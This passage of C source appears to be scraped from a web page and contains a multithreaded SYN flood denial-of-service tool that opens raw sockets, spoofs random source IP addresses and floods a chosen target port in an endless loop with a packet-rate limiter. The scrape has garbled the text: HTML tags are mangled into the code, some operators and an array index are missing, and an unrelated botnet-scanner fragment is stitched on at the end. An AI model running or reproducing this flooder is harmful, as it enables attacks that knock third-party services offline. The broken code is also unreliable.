1018. char datagram[MAX_PACKET_SIZE];
1019. struct iphdr *iph = (struct iphdr *)datagram;
1020. struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
1021.  
1022. struct sockaddr_in sin;
1023. sin.sin_family = AF_INET;
1024. sin.sin_port = htons(floodport);
1025. sin.sin_addr.s_addr = inet_addr(td);
1026.  
1027. int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
1028. if(s < 0){
1029. fprintf(stderr, "Could not open raw socket.\n");
1030. exit(-1);
1031. }
1032. memset(datagram, 0, MAX_PACKET_SIZE);
1033. setup_ip_header(iph);
1034. setup_tcp_header(tcph);
1035.  
1036. tcph->dest = htons(floodport);
1037.  
1038. iph->daddr = sin.sin_addr.s_addr;
1039. iph->check = csum ((unsigned short *) datagram, iph->tot_len);
1040.  
1041. int tmp = 1;
1042. const int *val = &tmp;
1043. if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
1044. fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
1045. exit(-1);
1046. }
1047.  
1048. init_rand(time(NULL));
1049. register unsigned int i;
1050. i = 0;
1051. while(1){
1052. sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
1053. setup_ip_header(iph);
1054. setup_tcp_header(tcph);
1055. iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
1056. iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
1057.  
1058. tcph->dest = htons(floodport);
1059.  
1060. iph->daddr = sin.sin_addr.s_addr;
1061.  
1062. iph->check = csum ((unsigned short *) datagram, iph->tot_len);
1063. tcph->seq = rand_cmwc() & 0xFFFF;
1064. tcph->source = htons(rand_cmwc() & 0xFFFF);
1065. tcph->check = 0;
1066. tcph->check = tcpcsum(iph, tcph);
1067.  
1068. pps++;
1069. if(i >= limiter)
1070. {
1071. i = 0;
1072. usleep(sleeptime);
1073. }
1074. i++;
1075. }
1076. }
1077. int main(int argc, char *argv[ ])
1078. {
1079. if(argc < 6){
1080. fprintf(stderr, "Invalid parameters!\n");
1081. fprintf(stdout, "SSYN Flooder by LSDEV\nImproved by Starfall\nUsage: %s <target ip=""><port to="" be="" flooded=""><number threads="" to="" use=""><pps limiter,="" -1="" for="" no="" limit=""><time>\n", argv[0]);
1082. exit(-1);
1083. }
1084. srand(time(0));
1085. fprintf(stdout, "Tank: So what do you need? Besides a miracle.\nNeo: Packets. Lots of packets.\n");
1086.  
1087. int num_threads = atoi(argv[3]);
1088. floodport = atoi(argv[2]);
1089. int maxpps = atoi(argv[4]);
1090. limiter = 0;
1091. pps = 0;
1092. pthread_t thread[num_threads];
1093.  
1094. int multiplier = 20;
1095.  
1096. int i;
1097. for(i = 0;i<num_threads;i++){<br> pthread_create( &thread_, NULL, &flood, (void *)argv[1]);
1098. }
1099. for(i = 0;i<(atoi(argv[5])*multiplier);i++)
1100. {
1101. usleep((1000/multiplier)1000);
1102. if((ppsmultiplier) > maxpps)
1103. {
1104. if(1 > limiter)
1105. {
1106. sleeptime+=100;
1107. } else {
1108. limiter–;
1109. }
1110. } else {
1111. limiter++;
1112. if(sleeptime > 25)
1113. {
1114. sleeptime-=25;
1115. } else {
1116. sleeptime = 0;
1117. }
1118. }
1119. pps = 0;
1120. }
1121.  
1122. return 0;
1123. }</num_threads;i++){<br></time></pps></number></port></target>____</time.h></netinet></netinet></sys></string.h></stdlib.h></stdio.h></unistd.h></pthread.h>
1124.  
1125. static BOOL can_consume(struct scanner_connection *conn, uint8_t *ptr, int amount)
1126. {
1127. uint8_t *end = conn->rdbuf + conn->rdbuf_pos;
1128.  
1129. return ptr + amount < end;
1130. }
1131.  
1132. #endif